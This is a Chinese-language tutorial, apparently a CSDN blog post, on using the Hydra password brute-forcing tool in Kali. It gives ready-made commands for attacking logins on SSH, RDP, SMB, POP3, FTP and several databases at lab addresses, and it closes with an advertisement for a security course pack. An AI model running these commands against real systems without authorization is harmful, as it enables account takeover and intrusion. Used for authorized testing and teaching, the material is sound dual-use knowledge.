应用协议安全:Hydra 端口爆破工具.(九头蛇)
Hydra 也叫九头蛇,是一款开源的暴力PJ工具,集成在kali当中。可以对多种服务的账号和密码进行爆破,包括 Web
登录、数据库、SSH、FTP 等服务.
目录:
应用协议安全:Hydra 端口爆破工具.(九头蛇)
Hydra(九头蛇)使用:
使用方法:直接打开 kali 终端,输入.
(1)实战:爆破 SSH 协议.( 22 端口 )
(2)实战:爆破 远程桌面 RDP.( 3389 端口 )
(3)实战:爆破 共享文件 SMB ( 445 端口 )
(4)实战:爆破 邮箱协议 POP3( 110 端口 )
(5)实战:爆破 文件传输 FTP ( 21 端口 )
(6)实战:爆破 MSSQL数据库( 1433 端口 )
(7)实战:爆破 MySQL数据库( 3306 端口 )
(8)实战:爆破 Oracle数据库( 1521 端口 )
(9)实战:爆破 Redis数据库( 6379 端口 )
(10)实战:爆破 PgSQL数据库( 5432 端口 )
免责声明:
严禁利用本文章中所提到的技术进行非法攻击,否则后果自负,上传者不承担任何责任。
Hydra(九头蛇)使用的参数:
-s 指定端口
-l 指定用户名
-L 指定用户名字典(文件)
-p 指定密码破解
-P 指定密码字典(文件)
-o 保存执行结果
-e 空密码探测和指定用户密码探测(ns)
-C 用户名可以用:分割(username:password)
-vV 显示详细过程
Hydra(九头蛇)使用:
使用方法:直接打开 kali 终端,输入.
hydra
(1)实战:爆破 SSH 协议.( 22 端口 )
hydra -L /root/root.txt -P /root/root.txt 192.168.0.105 ssh
-L 指定用户名字典(文件)
-P 指定密码字典(文件)
ssh iwebsec@192.168.0.105 //登录 ssh (22端口)
ssh 账号@地址
(2)实战:爆破 远程桌面 RDP.( 3389 端口 )
hydra -l administrator -P /root/root.txt 192.168.0.106 rdp -vV
-l 指定用户名
-P 指定密码字典(文件)
-vV 显示详细过程
rdesktop 192.168.0.106:3389 //登录远程桌面3389
rdesktop 地址:3389
(3)实战:爆破 共享文件 SMB ( 445 端口 )
hydra -l administrator -P /root/root.txt 192.168.0.106 smb
-l 指定用户名
-P 指定密码字典(文件)
(4)实战:爆破 邮箱协议 POP3( 110 端口 )
hydra -L /root/root.txt -P /root/root.txt 192.168.0.105 pop3 -vV
-L 指定用户名字典(文件)
-P 指定密码字典(文件)
-vV 显示详细过程
(5)实战:爆破 文件传输 FTP ( 21 端口 )
hydra -L /root/root.txt -P /root/root.txt 192.168.0.105 ftp -vV
-L 指定用户名字典(文件)
-P 指定密码字典(文件)
-vV 显示详细过程
(6)实战:爆破 MSSQL数据库( 1433 端口 )
hydra -l sa -P /root/root.txt 192.168.0.106 mssql -vV
-l 指定用户名
-P 指定密码字典(文件)
-vV 显示详细过程
(7)实战:爆破 MySQL数据库( 3306 端口 )
hydra -L /root/root.txt -P /root/root.txt 192.168.0.106 mysql -vV
-L 指定用户名字典(文件)
-P 指定密码字典(文件)
-vV 显示详细过程
(8)实战:爆破 Oracle数据库( 1521 端口 )
hydra -L /root/root.txt -P /root/root.txt 192.168.0.106 oracle -vV
-L 指定用户名字典(文件)
-P 指定密码字典(文件)
-vV 显示详细过程
(9)实战:爆破 Redis数据库( 6379 端口 )
hydra -L /root/root.txt -P /root/root.txt 192.168.0.106 redis -vV
-L 指定用户名字典(文件)
-P 指定密码字典(文件)
-vV 显示详细过程
(10)实战:爆破 PgSQL数据库( 5432 端口 )
hydra -L /root/root.txt -P /root/root.txt 192.168.0.106 postgresql -vV
-L 指定用户名字典(文件)
-P 指定密码字典(文件)
-vV 显示详细过程
学习计划安排
我一共划分了六个阶段,但并不是说你得学完全部才能上手工作,对于一些初级岗位,学到第三四个阶段就足矣~
这里我整合并且整理成了一份【282G】的网络安全从零基础入门到进阶资料包,需要的小伙伴可以扫描下方CSDN官方合作二维码免费领取哦,无偿分享!!!
如果你对网络安全入门感兴趣,那么你需要的话可以
点击这里👉[网络安全重磅福利:入门&进阶全套282G学习资源包免费分享!](https://mp.weixin.qq.com/s/BWb9OzaB-
gVGVpkm161PMw)
①网络安全学习路线
②上百份渗透测试电子书
③安全攻防357页笔记
④50份安全攻防面试指南
⑤安全红队渗透工具包
⑥HW护网行动经验总结
⑦100个漏洞实战案例
⑧安全大厂内部视频资源
⑨历年CTF夺旗赛题解析
![](https://img-
blog.csdnimg.cn/img_convert/348d85c9cb8ee2fee249057bb415c3fd.jpeg)
网络安全工程师(白帽子)企业级学习路线
第一阶段:安全基础(入门)
第二阶段:Web渗透(初级网安工程师)
第三阶段:进阶部分(中级网络安全工程师)
如果你对网络安全入门感兴趣,那么你需要的话可以点击这里👉网络安全重磅福利:入门&进阶全套282G学习资源包免费分享!